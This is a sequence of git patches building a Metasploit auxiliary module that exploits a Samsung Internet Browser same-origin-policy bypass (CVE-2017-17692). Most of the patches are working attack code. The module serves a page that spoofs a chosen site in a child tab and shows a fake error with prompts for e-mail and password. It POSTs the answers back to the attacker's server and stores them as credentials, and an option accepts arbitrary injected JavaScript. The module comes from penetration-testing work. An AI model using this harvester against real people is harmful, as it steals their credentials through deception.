From 3dad025b8cdc784791ac756d66508f6573431024 Mon Sep 17 00:00:00 2001 From: RootUp Date: Tue, 7 Nov 2017 14:24:50 +0530 Subject: [PATCH 01/16] Create browser_sop_bypass.rb --- .../auxiliary/gather/browser_sop_bypass.rb | 54 +++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 modules/auxiliary/gather/browser_sop_bypass.rb diff --git a/modules/auxiliary/gather/browser_sop_bypass.rb b/modules/auxiliary/gather/browser_sop_bypass.rb new file mode 100644 index 0000000000..cd73a6ad61 --- /dev/null +++ b/modules/auxiliary/gather/browser_sop_bypass.rb @@ -0,0 +1,54 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpServer + Rank = GoodRanking + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => "Browser SOP Bypass", + 'Description' => %q( + This module do a server-redirect combined with a data-URI end up bypassing the Same Origin Policy,which leads to all kind of vulnerabilities like stealing user passwords. + ), + 'License' => MSF_LICENSE, + 'Author' => [ + 'Dhiraj Mishra', + ], + 'References' => [ + [ 'URL', 'http://fr.0day.today/exploit/description/28434'], + ], + 'DisclosureDate' => "Nov 09 2017", + 'Actions' => [[ 'WebServer' ]], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer' + ) + ) + end + + def run + exploit # start http server + end + + def setup + @html = %| + + + + | + end + + def on_request_uri(cli, _request) + print_status('Sending response') + send_response(cli, @html) + end +end From 2fad61101e560eb2e238cf2d722cf00d19fddc0f Mon Sep 17 00:00:00 2001 From: RootUp Date: Tue, 7 Nov 2017 21:13:06 +0530 Subject: [PATCH 02/16] Update browser_sop_bypass.rb --- modules/auxiliary/gather/browser_sop_bypass.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/gather/browser_sop_bypass.rb b/modules/auxiliary/gather/browser_sop_bypass.rb index cd73a6ad61..39ff69200b 100644 --- a/modules/auxiliary/gather/browser_sop_bypass.rb +++ b/modules/auxiliary/gather/browser_sop_bypass.rb @@ -5,7 +5,6 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer - Rank = GoodRanking def initialize(info = {}) super( @@ -19,8 +18,8 @@ class MetasploitModule < Msf::Auxiliary 'Author' => [ 'Dhiraj Mishra', ], - 'References' => [ - [ 'URL', 'http://fr.0day.today/exploit/description/28434'], + 'References' => + ['URL', 'http://fr.0day.today/exploit/description/28434'], ], 'DisclosureDate' => "Nov 09 2017", 'Actions' => [[ 'WebServer' ]], From 872894f74323a5213c2db6153585b57ecd0c44dc Mon Sep 17 00:00:00 2001 From: RootUp Date: Tue, 7 Nov 2017 21:29:16 +0530 Subject: [PATCH 03/16] Update browser_sop_bypass.rb --- modules/auxiliary/gather/browser_sop_bypass.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/browser_sop_bypass.rb b/modules/auxiliary/gather/browser_sop_bypass.rb index 39ff69200b..40b0809c24 100644 --- a/modules/auxiliary/gather/browser_sop_bypass.rb +++ b/modules/auxiliary/gather/browser_sop_bypass.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary 'Author' => [ 'Dhiraj Mishra', ], - 'References' => + 'References' => [ ['URL', 'http://fr.0day.today/exploit/description/28434'], ], 'DisclosureDate' => "Nov 09 2017", From 0c247d563583fa637fa74de59f2f6bbe69dc6c08 Mon Sep 17 00:00:00 2001 From: RootUp Date: Wed, 8 Nov 2017 12:38:37 +0530 Subject: [PATCH 04/16] Update browser_sop_bypass.rb --- modules/auxiliary/gather/browser_sop_bypass.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/gather/browser_sop_bypass.rb b/modules/auxiliary/gather/browser_sop_bypass.rb index 40b0809c24..8a3430997d 100644 --- a/modules/auxiliary/gather/browser_sop_bypass.rb +++ b/modules/auxiliary/gather/browser_sop_bypass.rb @@ -10,9 +10,10 @@ class MetasploitModule < Msf::Auxiliary super( update_info( info, - 'Name' => "Browser SOP Bypass", + 'Name' => "Samsung Internet Browser SOP Bypass", 'Description' => %q( - This module do a server-redirect combined with a data-URI end up bypassing the Same Origin Policy,which leads to all kind of vulnerabilities like stealing user passwords. + This module opens up and does a server-redirect to child tab using document.body.innerHTML funtion, the child tab creates a fake pop up asking email ID, Password. + Once entered the credentials is passed back to the parent tab, In this case the address bar points to google.com/csi which actually can be used to trick some one. ), 'License' => MSF_LICENSE, 'Author' => [ @@ -21,7 +22,7 @@ class MetasploitModule < Msf::Auxiliary 'References' => [ ['URL', 'http://fr.0day.today/exploit/description/28434'], ], - 'DisclosureDate' => "Nov 09 2017", + 'DisclosureDate' => "Nov 08 2017", 'Actions' => [[ 'WebServer' ]], 'PassiveActions' => [ 'WebServer' ], 'DefaultAction' => 'WebServer' From 03cd8af29a81b4b54f806d888e9663658a0c1543 Mon Sep 17 00:00:00 2001 From: RootUp Date: Wed, 8 Nov 2017 12:50:49 +0530 Subject: [PATCH 05/16] Update browser_sop_bypass.rb --- modules/auxiliary/gather/browser_sop_bypass.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/browser_sop_bypass.rb b/modules/auxiliary/gather/browser_sop_bypass.rb index 8a3430997d..c75c030185 100644 --- a/modules/auxiliary/gather/browser_sop_bypass.rb +++ b/modules/auxiliary/gather/browser_sop_bypass.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary info, 'Name' => "Samsung Internet Browser SOP Bypass", 'Description' => %q( - This module opens up and does a server-redirect to child tab using document.body.innerHTML funtion, the child tab creates a fake pop up asking email ID, Password. + This module opens up and does a server-redirect to child tab using document.body.innerHTML funtion, the child tab creates a fake pop up asking email ID, Password. Once entered the credentials is passed back to the parent tab, In this case the address bar points to google.com/csi which actually can be used to trick some one. ), 'License' => MSF_LICENSE, From aee883a706ad842c87facf4b17bb4c08996bcb4c Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Fri, 8 Dec 2017 12:24:58 -0600 Subject: [PATCH 06/16] Fixed up description to be descriptive --- modules/auxiliary/gather/browser_sop_bypass.rb | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/browser_sop_bypass.rb b/modules/auxiliary/gather/browser_sop_bypass.rb index c75c030185..ec1f3e0208 100644 --- a/modules/auxiliary/gather/browser_sop_bypass.rb +++ b/modules/auxiliary/gather/browser_sop_bypass.rb @@ -12,8 +12,12 @@ class MetasploitModule < Msf::Auxiliary info, 'Name' => "Samsung Internet Browser SOP Bypass", 'Description' => %q( - This module opens up and does a server-redirect to child tab using document.body.innerHTML funtion, the child tab creates a fake pop up asking email ID, Password. - Once entered the credentials is passed back to the parent tab, In this case the address bar points to google.com/csi which actually can be used to trick some one. + This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the + Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices. + It initiates a server-redirect to a child tab using the document.body.innerHTML + function, which causes the child tab to create a fake pop-up. This pop-up prompts the user + for a username and password which appears to originate from the targeted URL's domain. Once + entered, the credentials are passed to the parent tab as well as stored locally. ), 'License' => MSF_LICENSE, 'Author' => [ From 0a9dcafb776522fb1d8febeb89d9d1bd4264108f Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Fri, 8 Dec 2017 13:51:02 -0600 Subject: [PATCH 07/16] Actually collect the creds, sort of Instead of an alert() (which the attacker won't see), this collects the offered credentials in a POST action, and displays them in the console. This should further store the creds somewhere handy, but this is good enough for now for testing from @RootUp --- .../auxiliary/gather/browser_sop_bypass.rb | 72 +++++++++++++++---- 1 file changed, 59 insertions(+), 13 deletions(-) diff --git a/modules/auxiliary/gather/browser_sop_bypass.rb b/modules/auxiliary/gather/browser_sop_bypass.rb index ec1f3e0208..e43f1ae81b 100644 --- a/modules/auxiliary/gather/browser_sop_bypass.rb +++ b/modules/auxiliary/gather/browser_sop_bypass.rb @@ -32,6 +32,20 @@ class MetasploitModule < Msf::Auxiliary 'DefaultAction' => 'WebServer' ) ) + + register_options([ + OptString.new('TARGET_URL', [ + true, + "The URL to spoof origin from.", + 'http://example.com' + ]), + OptString.new('CUSTOM_HTML', [ + true, + "HTML to display to the victim.", + 'This page has moved. Please click here redirect your browser.' + ]), + + ]) end def run @@ -39,20 +53,52 @@ class MetasploitModule < Msf::Auxiliary end def setup - @html = %| - - - - | + @html = <<-EOS + + + + + #{datastore['CUSTOM_HTML']} + + EOS end - def on_request_uri(cli, _request) - print_status('Sending response') - send_response(cli, @html) + # TODO: This does not actually save the credential, since it's gathered from the user + # and there's no real solid way to associate it with the domain part of the target_url. + # Suggestions welcome if this should be saved with store_loot or just make a guess on the + # target. + def collect_data(request) + creds = JSON.parse(request.body) + u = creds['user'] + p = creds['pass'] + print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}") end + + def on_request_uri(cli, request) + case request.method.downcase + when 'get' # initial connection + print_status("#{cli.peerhost}: Request '#{request.method} #{request.uri}'") + print_status("#{cli.peerhost}: Attempting to spoof origin for #{datastore['TARGET_URL']}") + send_response(cli, @html) + when 'post' # must have fallen for it + collect_data(request) + else + print_error("#{cli.peerhost}: Unhandled method: #{request.method}") + end + end + end From cba5c7cb0fd7a1b6a88f2bf8e85be120c46fcf38 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Fri, 8 Dec 2017 13:53:13 -0600 Subject: [PATCH 08/16] Rename to actually call out the browser name --- .../{browser_sop_bypass.rb => samsung_browser_sop_bypass.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/gather/{browser_sop_bypass.rb => samsung_browser_sop_bypass.rb} (100%) diff --git a/modules/auxiliary/gather/browser_sop_bypass.rb b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb similarity index 100% rename from modules/auxiliary/gather/browser_sop_bypass.rb rename to modules/auxiliary/gather/samsung_browser_sop_bypass.rb From 5f701992185e1aa13e54f888cd987a54de255297 Mon Sep 17 00:00:00 2001 From: RootUp Date: Tue, 12 Dec 2017 15:52:55 +0530 Subject: [PATCH 09/16] Update samsung_browser_sop_bypass.rb --- modules/auxiliary/gather/samsung_browser_sop_bypass.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb index e43f1ae81b..ade53e098b 100644 --- a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb +++ b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb @@ -21,7 +21,9 @@ class MetasploitModule < Msf::Auxiliary ), 'License' => MSF_LICENSE, 'Author' => [ - 'Dhiraj Mishra', + 'Dhiraj Mishra', # Original discovery, disclosure + 'Tod Beardsley', # Metasploit module + 'Jeffrey Martin' # Metasploit module ], 'References' => [ ['URL', 'http://fr.0day.today/exploit/description/28434'], @@ -37,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary OptString.new('TARGET_URL', [ true, "The URL to spoof origin from.", - 'http://example.com' + 'http://example.com/' ]), OptString.new('CUSTOM_HTML', [ true, From efa46efb4883fbaff1d3277432b5116fab012101 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Tue, 12 Dec 2017 14:06:18 -0600 Subject: [PATCH 10/16] Actually save creds, or fail through sanely This incidentally also allows for a custom collector to be implemented by the user -- for example, if they'd rather pick up a session ID or inject a browser hook or something along those lines. It's a little clunky, using the advanced option of CUSTOM_JS, but it seems to work fine. --- .../gather/samsung_browser_sop_bypass.rb | 83 ++++++++++++++----- 1 file changed, 60 insertions(+), 23 deletions(-) diff --git a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb index ade53e098b..f570af0928 100644 --- a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb +++ b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb @@ -14,10 +14,8 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q( This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices. - It initiates a server-redirect to a child tab using the document.body.innerHTML - function, which causes the child tab to create a fake pop-up. This pop-up prompts the user - for a username and password which appears to originate from the targeted URL's domain. Once - entered, the credentials are passed to the parent tab as well as stored locally. + By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather + credentials via a fake pop-up. ), 'License' => MSF_LICENSE, 'Author' => [ @@ -46,14 +44,42 @@ class MetasploitModule < Msf::Auxiliary "HTML to display to the victim.", 'This page has moved. Please click here redirect your browser.' ]), - ]) + + register_advanced_options([ + OptString.new('CUSTOM_JS', [ + false, + "Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.", + '' + ]) + ]) + end def run exploit # start http server end + def evil_javascript + if not datastore['CUSTOM_JS'].nil? and not datastore['CUSTOM_JS'].empty? + js = datastore['CUSTOM_JS'] + else + js = <<-EOS + setTimeout(function(){ + x.document.body.innerHTML='

404 Error

'+ + '

Oops, something went wrong.

'; + a=x.prompt('E-mail',''); + b=x.prompt('Password',''); + var cred=JSON.stringify({'user':a,'pass':b}); + var xmlhttp = new XMLHttpRequest; + xmlhttp.open('POST', window.location, true); + xmlhttp.send(cred); + }, 3000); + EOS + end + return js + end + def setup @html = <<-EOS @@ -61,16 +87,7 @@ class MetasploitModule < Msf::Auxiliary @@ -79,15 +96,35 @@ class MetasploitModule < Msf::Auxiliary EOS end - # TODO: This does not actually save the credential, since it's gathered from the user - # and there's no real solid way to associate it with the domain part of the target_url. - # Suggestions welcome if this should be saved with store_loot or just make a guess on the - # target. + def store_cred(username,password) + credential_data = { + origin_type: :import, + module_fullname: self.fullname, + filename: 'msfconsole', + workspace_id: myworkspace_id, + service_name: 'web_service', + realm_value: datastore['TARGET_URL'], + realm_key: Metasploit::Model::Realm::Key::WILDCARD, + private_type: :password, + private_data: password, + username: username + } + create_credential(credential_data) + end + + # This assumes the default schema is being used. + # If it's not that, it'll just display the collected POST data. def collect_data(request) - creds = JSON.parse(request.body) - u = creds['user'] - p = creds['pass'] - print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}") + cred = JSON.parse(request.body) + u = cred['user'] + p = cred['pass'] + if not u.nil? and not u.empty? and not p.nil? and not p.empty? + print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}") + store_cred(u,p) + # Do some cred storage here + else + print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}") + end end def on_request_uri(cli, request) From 622050ddfc2a24bbd3da5fb4a6600756872b8871 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Tue, 12 Dec 2017 14:48:00 -0600 Subject: [PATCH 11/16] Oops, leftover comment --- modules/auxiliary/gather/samsung_browser_sop_bypass.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb index f570af0928..246a3d58ad 100644 --- a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb +++ b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb @@ -121,7 +121,6 @@ class MetasploitModule < Msf::Auxiliary if not u.nil? and not u.empty? and not p.nil? and not p.empty? print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}") store_cred(u,p) - # Do some cred storage here else print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}") end From 966060d470135e915e8d610613f49d6315d224bd Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 13 Dec 2017 16:38:17 -0600 Subject: [PATCH 12/16] Nits picked by @bcoles: commas, quotes, and --- .../auxiliary/gather/samsung_browser_sop_bypass.rb | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb index 246a3d58ad..a34d918379 100644 --- a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb +++ b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super( update_info( info, - 'Name' => "Samsung Internet Browser SOP Bypass", + 'Name' => 'Samsung Internet Browser SOP Bypass', 'Description' => %q( This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices. @@ -26,7 +26,7 @@ class MetasploitModule < Msf::Auxiliary 'References' => [ ['URL', 'http://fr.0day.today/exploit/description/28434'], ], - 'DisclosureDate' => "Nov 08 2017", + 'DisclosureDate' => 'Nov 08 2017', 'Actions' => [[ 'WebServer' ]], 'PassiveActions' => [ 'WebServer' ], 'DefaultAction' => 'WebServer' @@ -36,20 +36,20 @@ class MetasploitModule < Msf::Auxiliary register_options([ OptString.new('TARGET_URL', [ true, - "The URL to spoof origin from.", + 'The URL to spoof origin from.', 'http://example.com/' ]), OptString.new('CUSTOM_HTML', [ true, - "HTML to display to the victim.", + 'HTML to display to the victim.', 'This page has moved. Please click here redirect your browser.' - ]), + ]) ]) register_advanced_options([ OptString.new('CUSTOM_JS', [ false, - "Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.", + 'Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.', '' ]) ]) @@ -84,12 +84,14 @@ class MetasploitModule < Msf::Auxiliary @html = <<-EOS + + #{datastore['CUSTOM_HTML']} From 5226181d6d7ea23a5ed74888a0313108a88cea7b Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 13 Dec 2017 16:48:05 -0600 Subject: [PATCH 13/16] Better conditionals from @bcoles --- .../gather/samsung_browser_sop_bypass.rb | 46 +++++++++---------- 1 file changed, 22 insertions(+), 24 deletions(-) diff --git a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb index a34d918379..ac739f8356 100644 --- a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb +++ b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb @@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary OptString.new('CUSTOM_HTML', [ true, 'HTML to display to the victim.', - 'This page has moved. Please click here redirect your browser.' + 'This page has moved. Please click here to redirect your browser.' ]) ]) @@ -61,23 +61,20 @@ class MetasploitModule < Msf::Auxiliary end def evil_javascript - if not datastore['CUSTOM_JS'].nil? and not datastore['CUSTOM_JS'].empty? - js = datastore['CUSTOM_JS'] - else - js = <<-EOS - setTimeout(function(){ - x.document.body.innerHTML='

404 Error

'+ - '

Oops, something went wrong.

'; - a=x.prompt('E-mail',''); - b=x.prompt('Password',''); - var cred=JSON.stringify({'user':a,'pass':b}); - var xmlhttp = new XMLHttpRequest; - xmlhttp.open('POST', window.location, true); - xmlhttp.send(cred); - }, 3000); - EOS - end - return js + return datastore['CUSTOM_JS'] unless datastore['CUSTOM_JS'].blank? + js = <<-EOS + setTimeout(function(){ + x.document.body.innerHTML='

404 Error

'+ + '

Oops, something went wrong.

'; + a=x.prompt('E-mail',''); + b=x.prompt('Password',''); + var cred=JSON.stringify({'user':a,'pass':b}); + var xmlhttp = new XMLHttpRequest; + xmlhttp.open('POST', window.location, true); + xmlhttp.send(cred); + }, 3000); + EOS + js end def setup @@ -87,8 +84,10 @@ class MetasploitModule < Msf::Auxiliary @@ -120,11 +119,10 @@ class MetasploitModule < Msf::Auxiliary cred = JSON.parse(request.body) u = cred['user'] p = cred['pass'] - if not u.nil? and not u.empty? and not p.nil? and not p.empty? - print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}") - store_cred(u,p) - else + if u.blank? || p.blank? print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}") + else + print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}") end end From 3b3b0e6e96e85cd95e1c1d114d814800a0a1b6a6 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 14 Dec 2017 14:27:41 -0600 Subject: [PATCH 14/16] And this is why I hate using single quotes Also, restored the store_cred call. This will fix up RootUp/metasploit-framework#3 for PR #9180 --- modules/auxiliary/gather/samsung_browser_sop_bypass.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb index ac739f8356..b47b03dfd8 100644 --- a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb +++ b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb @@ -49,7 +49,7 @@ class MetasploitModule < Msf::Auxiliary register_advanced_options([ OptString.new('CUSTOM_JS', [ false, - 'Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.', + "Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.", '' ]) ]) @@ -123,6 +123,7 @@ class MetasploitModule < Msf::Auxiliary print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}") else print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}") + store_cred(u,p) end end From 8f91377acbefc11a58dc01efe53874bfe8e11b5b Mon Sep 17 00:00:00 2001 From: RootUp Date: Sat, 16 Dec 2017 22:09:21 +0530 Subject: [PATCH 15/16] Update samsung_browser_sop_bypass.rb --- modules/auxiliary/gather/samsung_browser_sop_bypass.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb index b47b03dfd8..8786e66a5e 100644 --- a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb +++ b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb @@ -24,6 +24,7 @@ class MetasploitModule < Msf::Auxiliary 'Jeffrey Martin' # Metasploit module ], 'References' => [ + [ 'CVE', '2017-17692' ] ['URL', 'http://fr.0day.today/exploit/description/28434'], ], 'DisclosureDate' => 'Nov 08 2017', From 917dd8e846c9cf4ce15d1951b6480498a33f3df9 Mon Sep 17 00:00:00 2001 From: RootUp Date: Sat, 16 Dec 2017 22:10:02 +0530 Subject: [PATCH 16/16] Update samsung_browser_sop_bypass.rb --- modules/auxiliary/gather/samsung_browser_sop_bypass.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb index 8786e66a5e..4efe26c029 100644 --- a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb +++ b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb @@ -24,8 +24,8 @@ class MetasploitModule < Msf::Auxiliary 'Jeffrey Martin' # Metasploit module ], 'References' => [ - [ 'CVE', '2017-17692' ] - ['URL', 'http://fr.0day.today/exploit/description/28434'], + [ 'CVE', '2017-17692' ], + ['URL', 'http://fr.0day.today/exploit/description/28434'] ], 'DisclosureDate' => 'Nov 08 2017', 'Actions' => [[ 'WebServer' ]],